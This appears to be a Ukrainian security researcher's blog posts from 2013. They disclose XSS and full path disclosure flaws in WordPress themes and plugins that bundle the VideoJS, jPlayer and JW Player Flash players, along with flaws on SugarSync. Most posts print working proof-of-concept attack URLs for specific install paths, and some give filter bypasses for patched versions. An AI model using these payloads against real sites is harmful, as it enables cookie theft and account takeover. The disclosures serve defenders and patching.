Websecurity - Веб безпека

У лютому, 07.02.2013, я виявив Cross-Site Scripting та Full path disclosure уразливості в темах для WordPress, що містять VideoJS. Раніше я писав про уразливості в VideoJS.

Це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в багатьох веб додатках. При стандартному пошуку VideoJS через Гугл дорки виводиться 446000 сайтів, а при пошуку по плагінам для WordPress можна знайти 171000 сайтів з цією флешкою.

Цей плеєр міститься в багатьох темах (шаблонах) для WordPress. Серед них Covert VideoPress, Photolio, Source, Smartstart та Crius. Та існують інші уразливі теми для WordPress з video-js.swf (судячи з гугл дорка). Розробники VideoJS випустили оновлення свого плеєра і всім розробникам веб додатків з VideoJS потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

Існують теми з багатьма флеш медіа плеєрами: окрім VideoJS вони мають jPlayer і JW Player. І такі теми мають усі XSS та Content Spoofing уразливості, які мають jPlayer і JW Player.

Covert VideoPress:

http://site/wp-content/themes/covertvideopress/assets/video-js.swf?readyFunction=alert(document.cookie)

Photolio:

http://site/wp-content/themes/photolio/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/photolio/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/photolio/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/photolio/js/jwplayer/video-js.swf?readyFunction=alert(document.cookie)

Source:

http://site/wp-content/themes/source/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/source/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/source/js/video/video-js.swf?readyFunction=alert(document.cookie)

Smartstart:

http://site/wp-content/themes/smartstart/js/video-js.swf?readyFunction=alert(document.cookie)

Crius:

http://site/wp-content/themes/crius/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/crius/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/crius/js/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/crius/js/video-js.swf?readyFunction=alert(document.cookie)

Full path disclosure (WASC-13):

Всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/covertvideopress/

http://site/wp-content/themes/photolio/

http://site/wp-content/themes/source/

http://site/wp-content/themes/smartstart/

http://site/wp-content/themes/crius/

Вразливі всі версії наступних веб додатків: Covert VideoPress, Photolio, Source, Smartstart та Crius.

Вразливі веб додатки, що використовують VideoJS Flash Component 3.0.2 і попередні версії. Версія VideoJS Flash Component 3.0.2 не вразлива до згаданої XSS дірки, але вразлива до XSS через JS калбеки (подібно до JW Player). А також є обхідні методи, що працюють в останній версії, але розробники не виправили їх через їхній невеликий вплив. Тому розробникам веб додатків з VideoJS потрібно оновити його до останньої версії.

У лютому, 07.02.2013, я виявив Cross-Site Scripting уразливості в плагінах для WordPress, що містять VideoJS. Раніше я писав про уразливості в VideoJS.

Це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в багатьох веб додатках. При стандартному пошуку VideoJS через Гугл дорки виводиться 446000 сайтів, а при пошуку по плагінам для WordPress можна знайти 178000 сайтів з цією флешкою.

На додачу до плагіна VideoJS - HTML5 Video Player for WordPress, про якого я писав раніше, ось нові плагіни з цим плеєром. Серед них Video Embed & Thumbnail Generator, External “Video for Everybody”, 1player, S3 Video і EasySqueezePage. Та існують інші уразливі плагіни для WordPress з video-js.swf (судячи з гугл дорка). Розробники VideoJS випустили оновлення свого плеєра і всім розробникам веб додатків з VideoJS потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

Video Embed & Thumbnail Generator:

http://site/wp-content/plugins/video-embed-thumbnail-generator/video-js/video-js.swf?readyFunction=alert(document.cookie)

External “Video for Everybody”:

http://site/wp-content/plugins/external-video-for-everybody/video-js/video-js.swf?readyFunction=alert(document.cookie)

1player:

http://site/wp-content/plugins/1player/players/video-js/video-js.swf?readyFunction=alert(document.cookie)

S3 Video:

http://site/wp-content/plugins/s3-video/misc/video-js.swf?readyFunction=alert(document.cookie)

EasySqueezePage:

http://site/wp-content/plugins/EasySqueezePage/videojs/video-js.swf?readyFunction=alert(document.cookie)

Вразливі наступні веб додатки: Video Embed & Thumbnail Generator 4.0.3 і попередні версії, External “Video for Everybody” 2.0 і попередні версії, 1player 1.2 і попередні версії, S3 Video 0.97 і попередні версії, EasySqueezePage (всі версії).

Вразливі веб додатки, що використовують VideoJS Flash Component 3.0.2 і попередні версії. Версія VideoJS Flash Component 3.0.2 не вразлива до згаданої XSS дірки, але вразлива до XSS через JS калбеки (подібно до JW Player). А також є обхідні методи, що працюють в останній версії, але розробники не виправили їх через їхній невеликий вплив. Тому розробникам веб додатків з VideoJS потрібно оновити його до останньої версії.

В даній добірці уразливості в веб додатках:

• HP LaserJet Pro 400 Multi Function Printers, Remote Unauthorized Access (деталі)
• Multiple vulnerabilities in Open-Xchange (деталі)
• HP LaserJet and Color LaserJet, Cross-Site Scripting (XSS) (деталі)
• zoneminder security update (деталі)
• HP Intelligent Management Center User Access Manager (UAM), Remote Execution of Arbitrary Code (деталі)
• typo3-src security update (деталі)
• Buffer overflow in Cisco Unified MeetingPlace Web Conferencing (деталі)
• smokeping security update (деталі)
• SQL injection vulnerability in Cisco Unified MeetingPlace (деталі)
• SynConnect PMS SQL Injection Vulnerability (деталі)

26.03.2013

У березні, 15.03.2013, я виявив Cross-Site Scripting та Full path disclosure уразливості в плагіні Search and Share для WordPress. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в BuddyPress для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

11.05.2013

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну.

http://site/wp-content/plugins/search-and-share/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Full path disclosure (WASC-13):

http://site/wp-content/plugins/search-and-share/SearchAndShare.php

http://site/wp-content/plugins/search-and-share/error_log (на сайтах, де відключене виведення помилок в php-файлах і вони записуються в error_log)

Уразливі Search and Share 0.9.3 та попередні версії. Додаток може працювати як плагін для WP, так і як стаціонарна програма.

25.01.2013

У грудні, 07.12.2012, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на популярному проекті https://www.sugarsync.com. Про що найближчим часом сповіщу адміністрацію сайта.

Хмарні сервіси такі ж діряві, як й звичайні онлайн сервіси. Що добре видно по уразливостям на них та взломам таких сервісів, як це мало місце з Dropbox.

Детальна інформація про уразливості з’явиться пізніше.

10.05.2013

XSS:

https://username.sugarsync.com/account/upgrade?returnUrl=%27;alert(document.cookie)//

В адресі вказується логін (username) користувача сервісу. Код спрацює при кліку на кнопки “OK” і “Cancel”. Це strictly social XSS.

Insufficient Anti-automation:

https://www.sugarsync.com/signup?startsub=5

З даних уразливостей XSS вже виправлена, але IAA все ще не виправлена. При цьому на сайті є ще багато інших дірок, на що я вже звертав увагу адміністраторів під час спілкування з приводу цих уразливостей.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Advanced XML Reader, Cardoza Ajax Search та W3 Total Cache. Для котрих з’явилися експлоіти. Advanced XML Reader - це плагін для читання XML, Cardoza Ajax Search - це локальна пошукова система по сайту, W3 Total Cache - це плагін для кешування веб сторінок.

• WordPress Plugin: Advanced XML Reader v0.3.4 XXE Vulnerability (деталі)
• WordPress Cardoza Ajax Search 1.1 SQL Injection (деталі)
• Wordpress W3 Total Cache PHP Code Execution (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У лютому, 07.02.2013, я виявив Cross-Site Scripting уразливості в численних веб додатках з VideoJS. Про що вже сповістив розробників п’яти наведених програм.

Раніше я писав про уразливості в VideoJS. Це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в багатьох веб додатках.

Зокрема в VideoJS - HTML5 Video Player for WordPress, Video.js for Drupal, bo:VideoJS for Joomla, videojs-youtube, Telemeta (CMS). Та в багатьох інших веб додатках. Розробники VideoJS минулого тижня випустили оновлення свого плеєра і всім розробникам веб додатків з VideoJS потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

VideoJS - HTML5 Video Player for WordPress:

http://site/wp-content/plugins/videojs-html5-video-player-for-wordpress/videojs/video-js.swf?readyFunction=alert(document.cookie)

Video.js for Drupal:

http://site/sites/all/libraries/video-js/video-js.swf?readyFunction=alert(document.cookie)

bo:VideoJS for Joomla:

http://site/plugins/content/bo_videojs/video-js/video-js.swf?readyFunction=alert(document.cookie)

videojs-youtube:

http://site/lib/video-js.swf?readyFunction=alert(document.cookie)

Telemeta:

http://site/htdocs/video-js/video-js.swf?readyFunction=alert(document.cookie)

Вразливі веб додатки, що використовують VideoJS Flash Component 3.0.2 і попередні версії. Версія VideoJS Flash Component 3.0.2 не вразлива до згаданої XSS дірки, але вразлива до XSS через JS калбеки (подібно до JW Player). А також є обхідні методи, що працюють в останній версії, але розробники не виправили їх через їхній невеликий вплив. Тому розробникам веб додатків з VideoJS потрібно оновити його до останньої версії.

Вразливі наступні веб додатки: VideoJS - HTML5 Video Player for WordPress 3.2.3 і попередні версії, Video.js for Drupal 6.x-2.2 і попередні 6.x-2.x версії та 7.x-2.2 і попередні 7.x-2.x версії, bo:VideoJS for Joomla 2.1.1 і попередні версії (з VideoJS Flash Component), videojs-youtube (всі версії), Telemeta 1.4.4 і попередні версії.

В даній добірці уразливості в веб додатках:

• Cisco Prime Data Center Network Manager Remote Command Execution Vulnerability (деталі)
• Apache VCL improper input validation (деталі)
• Cisco Secure Access Control System TACACS+ Authentication Bypass Vulnerability (деталі)
• Apache Rave exposes User over API (деталі)
• multiple implementations denial-of-service via MurmurHash algorithm collision (деталі)
• Persistent cross-site scripting in jforum (деталі)
• HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access (деталі)
• Reflected XSS in Asteriskguru Queue Statistics (деталі)
• F5 FirePass SSL VPN Unauthenticated local file inclusion (деталі)
• Directory Traversal Vulnerabilities in OpenCart 1.5.5.1 (деталі)

14.02.2013

У січні, 27.01.2013, а потім додатково 07.02.2013, я виявив Denial of Service та Cross-Site Scripting уразливості в VideoJS Flash Component. Це флеш компонент відео плеєра VideoJS. Про що раніше вже повідомив розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше.

07.05.2013

Окрім XSS дірки в VideoJS, також є DoS дірка, що торкається плеєра, яка стосується Flash Player і яку Adobe виправила ще 12.02.2013. Дана DoS (BSOD) уразливість у флеш плагіні спрацьовувала лише в цьому плеєрі.

Нещодавно, 30.04.2013, розробники виправили XSS уразливість в вихідному коді програми, а 02.05.2013, після мого нагадування, відкомпілювали флешку і завантажили її в обидва своїх репозитарії. На цьому тижні вони планують офіційно випустити VideoJS 4.0.

Cross-Site Scripting (WASC-08):

http://site/video-js.swf?readyFunction=alert(document.cookie)

Але виправлення в VideoJS Flash Component 3.0.2 не захищає проти наступних атак:

http://site/video-js.swf?readyFunction=alert

http://site/video-js.swf?readyFunction=prompt

http://site/video-js.swf?readyFunction=confirm

Вразливі версії перед VideoJS Flash Component 3.0.2 і VideoJS 4.0. Версії VideoJS Flash Component 3.0.2 і VideoJS 4.0 не вразливі до даної XSS дірки, але вразливі до XSS через JS калбеки (подібно до JW Player). А також є вищенаведені обхідні методи, що працюють в останній версії, але розробники не виправили їх через їхній невеликий вплив. Тим не менш вони обіцяли зайнятися цим в наступних версіях.

Нещодавно, 01.05.2013 я виявив нову Cross-Site Scripting уразливість в JW Player і JW Player Pro (що вже виправлена розробником). Вона стосується обох версій JW Player (безкоштовної і комерційної).

Раніше я вже писав про Content Spoofing та XSS уразливості в JW Player та JW Player Pro. Це нова XSS і про неї я не писав торік. Якщо дві попередні strictly social XSS дірки були в JW Player Pro, то ця дірка працює в обох версіях.

XSS (WASC-08):

http://site/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Для проведення атаки окрім параметра link потрібно вказати параметри displayclick=link та file. Якщо в параметрі file вказати відео, то це повинна бути адреса існуючого відео-файла, а якщо вказати зображення, то це може бути довільне ім’я jpg-файла (навіть неіснуючого).

Swf-файли JW Player можуть мати різні імена, такі як jwplayer.swf та player.swf.

Вразливі JW Player та JW Player Pro 5.10.2295 та попередні версії. Розробник виправив уразливість 20.08.2012 у версії 5.10.2393, разом з виправленням двох попередніх strictly social XSS дірок, про які я писав торік. Зазначу, що всі версії JW Player (з підтримкою калбеків), включаючи останні 6.x версії, все ще вразливі до XSS через JS калбеки, про що я писав у першому записі.